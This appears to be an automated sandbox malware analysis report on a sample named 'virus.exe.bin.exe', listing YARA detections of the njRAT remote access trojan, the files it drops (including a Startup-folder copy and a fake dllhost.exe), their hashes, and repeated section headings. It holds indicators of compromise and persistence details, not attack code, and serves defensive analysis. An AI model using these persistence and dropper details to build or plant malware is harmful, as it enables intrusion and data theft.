Source: Yara match	File source: 11.2.final.exe.133459a2.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.Payload.exe.2a6fef8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.virus.exe.bin.exe.1356599f.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Hyra.exe.12ababba.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.virus.exe.bin.exe.1356abb7.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Hyra.exe.12ab59a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Hyra.exe.12ac83ca.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.virus.exe.bin.exe.13560788.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000000.1505405429.0000000000472000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1629517817.0000000013345000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.3915823242.0000000002681000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1457358254.0000000013560000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1598765313.000000000337B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.1646811109.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1558924287.0000000012AB5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: virus.exe.bin.exe PID: 752, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Hyra.exe PID: 1952, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: final.exe PID: 3320, type: MEMORYSTR
Source: Yara match	File source: C:\ClickMe.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\dllhost.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe, type: DROPPED

Remote Access Functionality

Yara detected Njrat

Source: Yara match	File source: virus.exe.bin.exe, type: SAMPLE
Source: Yara match	File source: 11.2.final.exe.3758448.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Hyra.exe.12ababba.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.final.exe.133459a2.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.Payload.exe.2a6fef8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.0.Payload.exe.470000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.final.exe.3758448.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.final.exe.133459a2.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.Payload.exe.2a6fef8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.virus.exe.bin.exe.1356599f.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Hyra.exe.12ababba.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.virus.exe.bin.exe.1356abb7.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Hyra.exe.12ab59a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Hyra.exe.12ac83ca.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.virus.exe.bin.exe.13560788.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000000.1505405429.0000000000472000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1629517817.0000000013345000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.3915823242.0000000002681000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1457358254.0000000013560000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1598765313.000000000337B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.1646811109.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1558924287.0000000012AB5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: virus.exe.bin.exe PID: 752, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Hyra.exe PID: 1952, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: final.exe PID: 3320, type: MEMORYSTR
Source: Yara match	File source: C:\ClickMe.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\dllhost.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe, type: DROPPED

Windows Analysis Report
virus.exe.bin.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Compliance

Change of critical system settings

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

Operating System Destruction

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

ID:	1645584
Product:	CloudBasic
Start time:	23:08:16
Start date:	21.03.2025
Sample:	virus.exe.bin.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	b7ba3e0d0b59d704526b7ba31af583dc
SHA1:	9b69ae0cd6c19534e468f0c3616af680dd887445
SHA256:	69398832076d266d4a8fc08d36e150d39d976ea93e3bc03af2e1584107d8f815
Filetype:	Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Name	Type	MD5	SHA1	SHA256
C:\ClickMe.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	C94A477754F8487F5CE9DF9AAA037157	39600B40DACD804792547ACEB945166734E9F77D	91E595F7B7BD739921EC15581EB3E56CA7D8054DC8983A505F41D2D600C6B83E
C:\ProgramData\Oracle\Java\.oracle_jre_usage\b5820291038aa69c.timestamp	ASCII text, with CRLF line terminators	E5AFF970E6E26E4367593DD427A4C852	046E5348FC60AE1FFE40071C03984375C8AC8D42	369AF13B3D75B64199A724241789F8598EC045F85E98D745D03C2C0220F818DA
C:\Users\user\AppData\Local\Microsoft\CLR_v2.0\UsageLogs\Hyra.exe.log	ASCII text, with CRLF line terminators	B35DDA0EAD0E2A6B5CB03C4F9990E80C	D01DBAACCF20BEECE2844CF2746E4B56C3E61120	BB6FD375D6DAA2C16A432C0B2F074F6D338C1E02FCD9B5AC6C3D416F4A67F50A
C:\Users\user\AppData\Local\Microsoft\CLR_v2.0\UsageLogs\final.exe.log	ASCII text, with CRLF line terminators	B35DDA0EAD0E2A6B5CB03C4F9990E80C	D01DBAACCF20BEECE2844CF2746E4B56C3E61120	BB6FD375D6DAA2C16A432C0B2F074F6D338C1E02FCD9B5AC6C3D416F4A67F50A
C:\Users\user\AppData\Local\Microsoft\CLR_v2.0\UsageLogs\virus.exe.bin.exe.log	ASCII text, with CRLF line terminators	B35DDA0EAD0E2A6B5CB03C4F9990E80C	D01DBAACCF20BEECE2844CF2746E4B56C3E61120	BB6FD375D6DAA2C16A432C0B2F074F6D338C1E02FCD9B5AC6C3D416F4A67F50A
C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\Payload.exe.log	ASCII text, with CRLF line terminators	260E01CC001F9C4643CA7A62F395D747	492AD0ACE3A9C8736909866EEA168962D418BE5A	4BC52CCF866F489772A6919A0CC2C55B1432729D6BDF29E17E5853ABDFAB6030
C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\dllhost.exe.log	ASCII text, with CRLF line terminators	260E01CC001F9C4643CA7A62F395D747	492AD0ACE3A9C8736909866EEA168962D418BE5A	4BC52CCF866F489772A6919A0CC2C55B1432729D6BDF29E17E5853ABDFAB6030
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache	data	A0D5C3B381C326AD287EFF11A6CF177D	FDDCC8DF06872D4BD3D508088D7C0834AE33ED64	492D17EC7742DC3168A00E02FDDCF6309DBEE3271BC93DFE2804F069C943A757
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	data	B112CAE5B91E478291A3DBED152AAD15	4B2918FB437A9A285DB2C874FA9A6E7564CA6DE0	3CCFDFCADD1042E9F9F8B767CF0591C9FA65BC95083298984F25B683799B5061
C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\HugeHack.jar	Java archive data (JAR)	7D6B8CBC4989A4544BC16A54CC1B1379	1CBCE496A19E1C94A614C901503A3C1583326417	BA4DA4D1709BAF80E3EB33BFB2DB82374B19F4A198EA663B4289D197585F0524
C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	1251DA795628E7D7C27A67588AEBEDA9	6C6AAA1CA03008EE6F72F7C184EE5F688A5BD70B	C7BC1E49CAD7B787ABA7EE52FF2872157D380AF05DE9E0FEF245057DCD9A9310
C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	C94A477754F8487F5CE9DF9AAA037157	39600B40DACD804792547ACEB945166734E9F77D	91E595F7B7BD739921EC15581EB3E56CA7D8054DC8983A505F41D2D600C6B83E
C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\ere.js	ASCII text, with very long lines (575), with CRLF line terminators	80AD90C98E9EF8EAFFF93E660CD1F5CB	C1E03F1DF01AC5388F2C68D9001F00A4A65F60F1	55D1218D2454BCDB252EB1AFC5C6FAC56F93A4221CFBA61346E6338A0C3D106C
C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	DC2C9B059AB0C73E4EA49E776354F2D5	336F555DD328E37ADAEB5E9F146BD8B2A9898179	7270D1A70A203AF8F94986B3356BE85D991D32FDE0F985D82EF41B7EDB8415DC
C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	4CE347196EE1D687888195DC13F9859C	2784B1C3C06203B31915DA958554340991223E9D	780BF370F55BED41C91E40A07DB66BF12059F38E8AD1B9481DA1748BEA29FF48
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0vftcspt.po5.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_13cugyrj.azl.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ato02gvf.mrg.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m523dl4t.r0j.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mprylork.djn.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o4vvrkwm.tcn.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oyibnjd0.mfg.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rnp5us0g.2iu.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tothzoky.044.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zux5jb5i.ixv.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\hsperfdata_user\6252	data	DCBAC0BC53F73E185D06C5790929D465	B83079B4A059B72C18C7C57348181DB842669D8C	2791E1064F8A1610FC989E966D3DA5D9223E2633206B8021E8A5E72859659C86
C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\83aa4cc77f591dfc2374580bbd95f6ba_9e146be9-c76a-4720-bcdb-53011b87bd06	data	C8366AE350E7019AEFC9D1E6E6A498C6	5731D8A3E6568A5F2DFBBC87E3DB9637DF280B61	11E6ACA8E682C046C83B721EEB5C72C5EF03CB5936C60DF6F4993511DDC61238
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	C94A477754F8487F5CE9DF9AAA037157	39600B40DACD804792547ACEB945166734E9F77D	91E595F7B7BD739921EC15581EB3E56CA7D8054DC8983A505F41D2D600C6B83E
C:\Users\user\AppData\Roaming\dllhost.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	C94A477754F8487F5CE9DF9AAA037157	39600B40DACD804792547ACEB945166734E9F77D	91E595F7B7BD739921EC15581EB3E56CA7D8054DC8983A505F41D2D600C6B83E

Windows Analysis Report virus.exe.bin.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Compliance

Change of critical system settings

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

Operating System Destruction

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
virus.exe.bin.exe

Malware Threat Intel
Provided by